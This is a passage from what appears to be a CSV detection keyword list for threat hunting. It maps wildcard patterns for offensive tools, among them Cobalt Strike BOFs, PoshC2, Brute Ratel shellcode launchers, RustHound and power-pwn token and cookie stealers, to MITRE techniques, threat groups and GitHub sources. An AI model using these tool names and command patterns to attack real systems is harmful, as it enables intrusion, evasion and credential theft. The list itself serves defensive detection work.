offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation 
tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*run-dll SharpSploit*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*rundll32 charlotte.dll*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*rundll32*.dll*a*/p:*,greyware_tool_keyword,rundll32,Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account.,T1055.002 - T1078.002 - T1134.001 - T1134.002,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*rundll32*.dll*StartW*,greyware_tool_keyword,rundll32,Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.,T1218.005 - T1071.001,TA0002 - TA0003,N/A,N/A,Exploitation Tools,https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence,1,0,greyware tool - risks of False positive !,N/A,10,1224,189,2022-07-14T07:15:10Z,2021-01-01T16:44:42Z -*rundll32.exe agressor.dll*dec*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*RunDLL32JSStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Run-EXEonRemote*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*runFakeTerminal*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*Running final exploit packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*running SharpHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*RunOF.exe -*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*RunOF.Internals*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z 
-*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*runShellcode*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*runshellcode.asm*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A 
-*runshellcode.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*runshellcode.o*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A
-*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z
-*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z
-*RuralBishop.csproj*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - 
T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*RuralBishop.exe*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*RuralBishop.sln*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*RuralBishop-master*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*rustbof.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*rusthound * --zip --ldaps --adcs --old-bloodhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rusthound *--domain*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rusthound *--ldapfqdn *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rusthound *-ldaps *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rusthound -d *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD 
Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z
-*rusthound* --adcs --dc-only*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z
-*RustHound-main*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z
-*rvazarkar/GMSAPasswordReader*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z
-*Rvn0xsy/Cooolis-ms*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*rvrsh3ll/BOF_Collection*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*rvrsh3ll/TokenTactics*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*rwxfinder.*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and 
locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z -*RWXfinder-main*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z -*RXh0ZXJuYWwgQzIgUG9ydA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*rxwx/cs-rdll-ipc-example*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*s0lst1c3*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/s0lst1c3,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*s0md3v*,offensive_tool_keyword,Github Username,github username hosting offensive tools. 
mostly for web hacking,N/A,N/A,N/A,N/A,Web Attacks,https://github.com/s0md3v,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*s0md3v*Striker*,offensive_tool_keyword,Striker,Recon & Vulnerability Scanning Suite for web services,T1210.001 - T1190 - T1595 - T1192,TA0007 - TA0002 - TA0008 - ,N/A,N/A,Web Attacks,https://github.com/s0md3v/Striker,1,1,N/A,N/A,10,2114,454,2023-06-04T20:15:11Z,2017-10-30T07:08:02Z
-*S12cybersecurity/Admin2Sys*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z
